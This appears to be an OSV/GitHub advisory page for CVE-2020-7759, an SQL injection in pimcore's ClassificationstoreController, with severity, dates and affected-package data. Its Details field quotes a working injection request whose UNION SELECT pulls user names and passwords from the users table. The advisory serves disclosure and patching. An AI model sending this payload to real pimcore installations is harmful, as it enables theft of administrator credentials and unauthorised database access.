GHSA-8jmh-c6vr-pmvm
Suggest an improvement- Source
- https://github.com/advisories/GHSA-8jmh-c6vr-pmvm
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-8jmh-c6vr-pmvm/GHSA-8jmh-c6vr-pmvm.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-8jmh-c6vr-pmvm
- Aliases
-
- CVE-2020-7759
- SNYK-PHP-PIMCOREPIMCORE-1017405
- Published
- 2021-05-06T18:53:55Z
- Modified
- 2023-11-08T04:04:08.875107Z
- Severity
-
- 7.2 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- SQL Injection in pimcore
- Details
-
"The package pimcore/pimcore from 6.7.2 and before 6.8.3 are vulnerable to SQL Injection in data classification functionality in ClassificationstoreController. This can be exploited by sending a specifically-crafted input in the relationIds parameter as demonstrated by the following request: http://vulnerable.pimcore.example/admin/classificationstore/relations?relationIds=[{"keyId"%3a"''","groupId"%3a"'asd'))+or+1%3d1+union+(select+1,2,3,4,5,6,name,8,password,'',11,12,'',14+from+users)+--+"}]"
- Database specific
{ "nvd_published_at": "2020-10-30T11:15:00Z", "github_reviewed_at": "2021-04-20T17:18:14Z", "severity": "HIGH", "github_reviewed": true, "cwe_ids": [ "CWE-89" ] }- References
Affected packages
Packagist / pimcore/pimcore
Package
- Name
- pimcore/pimcore
- Purl
- pkg:composer/pimcore/pimcore